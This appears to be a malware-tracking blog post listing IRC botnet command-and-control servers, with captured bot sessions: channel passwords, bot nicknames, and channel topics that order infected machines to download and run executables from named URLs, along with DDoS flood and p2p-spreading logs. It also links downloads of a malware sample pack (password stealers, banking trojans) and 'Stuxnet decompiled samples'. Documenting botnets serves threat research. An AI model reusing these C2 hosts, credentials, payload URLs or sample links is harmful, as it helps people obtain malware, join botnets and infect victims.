Remote Host Port Number 59.61.93.126 81 NICK n[USA|XP]7424992 USER s “” “lol” :s JOIN #newbin# JOIN #bin# abc PONG 422 Now talking in #newbin# Topic On: [ #newbin# ] [ .dl http://www.freewebtown.com/newlow/im.exe ] Topic By: [ rm- ] (rm) !im http://tiny.cc/facebook-photo-18-02-2011 infos about hosting: http://whois.domaintools.com/59.61.93.126
Another malware package
Here around 34mb malware samples (fake antiviruses,passwd stealers,banking trojans etc) Download: http://www.p1nk.me/VtzvTy
dns.googleure.com(botnet hosted in Russian Federation 2×4.ru Network)
dns.googleure.com DNS_TYPE_A 92.241.164.227 92.241.164.227:1234 Nick: n{US|XPa}xvwpyyv Username: xvwpyyv Server Pass: null Joined Channel: #!ngr! with Password ngrBot Joined Channel: #US Channel Topic for Channel #!ngr!: “.mod pdef off .s .j -c IT,ITA,ES,ESP,FR,FRA #uz4 .up http://jeanie.ws/new.exe 3c62c54ff04ae4af8262ae4d5e2683c7” Private Message to Channel #!ngr!: “[d=”http://jeanie.ws/new.exe” s=”278528 bytes”] Updated bot file “C:Documents and SettingsAdministratorApplication DataDekfki.exe”” infos about hosting: http://whois.domaintools.com/92.241.164.227
nice.niceshot.in(botnet hosted in Netherlands Rijndata B.v)
Remote Host Port Number 46.21.169.42 6567 PASS s1m0n3t4 MODE [SI|USA|00|P|57896] -ix JOIN #yur# c1rc0dusoleil PONG Apple.Network NICK [SI|USA|00|P|57896] USER XP-0495 * 0 :COMPUTERNAME MODE [SI|USA|00|P|69385] -ix JOIN #wal# c1rc0dusoleil PRIVMSG #wal# :[Dl]: File download: 96.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_12581.exe @ 96.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|48857] USER XP-5184 * 0 :COMPUTERNAME MODE [SI|USA|00|P|48857] -ixRead more...
kay.gizliresimler.net(botnet hosted in United States Burlington The Endurance International Group Inc)
Remote Host Port Number 209.59.221.182 3232 PASS pass MODE [USA|XP|959443] -ix JOIN #yah pass PRIVMSG #yah :[p2p]: Spreading to p2p folders. PONG HTTP1.4 NICK [USA|XP|959443] USER vsnzefq * 0 :COMPUTERNAME Now talking in #yah Topic On: [ #yah ] [ .p2p ] Topic By: [ wc22 ] infos about hosting: http://whois.domaintools.com/209.59.221.182
77.79.7.106(botnet hosted in Lithuania Webhosting Collocation Services)
Remote Host Port Number 174.37.72.72 80 204.0.5.56 80 216.178.38.224 80 63.135.80.46 80 69.63.181.16 80 77.79.7.106 6663 PASS xxx MODE NEW-[USA|00|P|01494] -ix JOIN #!nn! test PONG irc.priv8net.com NICK NEW-[USA|00|P|01494] USER XP-6931 * 0 :COMPUTERNAME Now talking in #!nn! Topic On: [ #!nn! ] [ .m.s|.m.e Foto 😀 http://apps.facebook.com/phootosofyour/photo.php?= ] Topic By: [ wd38 ] Topic: wd38Read more...
74.117.174.101(botnet hosted in United States Seattle Kwshells Internet Services)
Remote Host Port Number 74.117.174.101 32321 MODE pLagUe{USA}50784 -ix JOIN #p# PONG cbl-101-1.aster.com.pl PRIVMSG #p# : New PC Infected. infos about hosting: http://whois.domaintools.com/74.117.174.101
minerva.cdmon.org(botnet hosted in Netherlands Amsterdam As29073 Ecatel Ltd)
NICK {XPUSA288239} USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA288239} -ix JOIN ##spam## MODE ##spam## -ix PRIVMSG ##spam## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds PRIVMSG ##spam## :.::[DDoS]::. Done with flood (0KB/sec). NICK {XPUSA796543} MODE {XPUSA796543} -ix Resolved : [minerva.cdmon.org] To [89.248.172.225] Now talking in ##security-check## Topic On: [ ##security-check## ] [ .part ##security-check# ]Read more...
205.234.213.231(botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 204.0.5.51 80 63.135.80.224 80 63.135.80.46 80 205.234.213.231 1234 PASS xxx NICK NEW-[USA|00|P|39876] USER XP-0115 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|39876] -ix JOIN #!nn! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/205.234.213.231
Stuxnet decompiled samples
Source here:http://crowdleaks.org/hbgary-wanted-to-suppress-stuxnet-research/ Download: http://11ec4fbd.whackyvidz.com